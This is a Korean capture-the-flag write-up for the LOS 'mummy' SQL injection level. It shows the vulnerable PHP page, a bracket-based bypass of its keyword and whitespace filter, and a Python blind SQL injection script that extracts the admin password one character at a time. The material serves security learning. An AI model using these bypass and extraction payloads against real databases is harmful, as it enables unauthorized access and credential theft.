
LOS Lv.44 mummy (풀이 봄)

mummy



query : select

<?php
  // LOS "mummy" challenge page (MSSQL backend). The query text below is built by
  // string concatenation from a request parameter, which is the injection point
  // the rest of this post works against.
  include "./config.php";
  login_chk();
  // NOTE(review): mssql_connect() is presumably a helper from config.php, since its
  // return value is later passed to sqlsrv_query(); the legacy mssql extension and
  // the sqlsrv extension are otherwise not interchangeable.
  $db = mssql_connect("mummy");
  // Case-insensitive blocklist: the words master / sys / information and the
  // characters ';', '(' and '/'. A blocklist over query text does not prevent
  // injection; the robust fix is to pass values through sqlsrv_query()'s
  // parameter array instead of concatenating them into the SQL string.
  if(preg_match('/master|sys|information|;|\(|\//i', $_GET['query'])) exit("No Hack ~_~");
  // Rejects every byte with value <= 32 (space, tab, newline, ...) anywhere in
  // the parameter; it does not inspect any other part of the request.
  for($i=0;$i<strlen($_GET['query']);$i++) if(ord($_GET['query'][$i]) <= 32) exit("%01~%20 can used as whitespace at mssql");
  // The executed statement is the literal "select" followed verbatim by the
  // (filtered) parameter.
  $query = "select".$_GET['query'];
  echo "<hr>query : <strong>{$query}</strong><hr><br>";
  $result = sqlsrv_fetch_array(sqlsrv_query($db,$query));
  // Only one bit leaks: whether column 0 of the first row is truthy. That single
  // bit is the yes/no oracle a blind extraction needs, so "no data shown" is not
  // the same as "no data exposed".
  if($result[0]) echo "<h2>Hello anonymous</h2>";

  // Fixed, attacker-independent query; the flag is awarded when the submitted pw
  // parameter is strictly identical (===) to the stored admin password.
  $query = "select pw from prob_mummy where id='admin'";
  $result = sqlsrv_fetch_array(sqlsrv_query($db,$query));
  if($result['pw'] === $_GET['pw']) solve("mummy");
  // Renders this file's own source on the page (why the listing appears above).
  highlight_file(__FILE__);
?>






Solution



컬럼 부분은 +로 우회가 안되는데, 정보를 못찾아서 결국 풀이 봄.

컬럼 이름을 select[id]from[test]where+id='admin' 이런 식으로 []로 감싸줄 수 있음.

비밀번호를 알아내야 해서 Blind sqli를 해야함.
?query=[id]from[prob_mummy]where%2bid='admin'and[pw]like%2b'0__%'


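import requests
import string

# Challenge endpoint and session for the LOS "mummy" level. The session cookie
# is redacted, so this listing is documentation of the approach, not a runnable
# tool.
url = 'https://los.rubiya.kr/chall/mummy_2e13c2a4483d845ce2d37f7c910f0f83.php'
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
cookies = {'PHPSESSID': '[redacted]'}

# Candidate alphabet for a single password character: digits then a-z.
check = "0123456789" + string.ascii_lowercase
# Upper bound on password length (same 19 rounds as the original range(1, 20)).
MAX_LEN = 19
# The page prints this heading only when the injected query yielded a truthy
# first column; it is the one-bit oracle the loop reads.
HELLO = "<h2>Hello anonymous</h2>"
# The original call had no timeout, so a stalled connection hung the script
# forever; bound every request instead.
TIMEOUT = 10

pw = ''

for _ in range(MAX_LEN):
    for j in check:
        payload = {'query': "[id]from[prob_mummy]where+id='admin'and[pw]like+'" + pw + j + "%'"}
        res = requests.get(url, headers=headers, params=payload, cookies=cookies, timeout=TIMEOUT)
        if HELLO in res.text:
            pw += j
            print("pw : " + pw)  # 0c3cc245
            break
    else:
        # No candidate extended the prefix: the value is complete (or uses a
        # character outside `check`). The original kept re-probing the full
        # alphabet for every remaining round; stop here instead.
        break

print("MUMMY Clear!")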






This post is licensed under CC BY 4.0 by the author.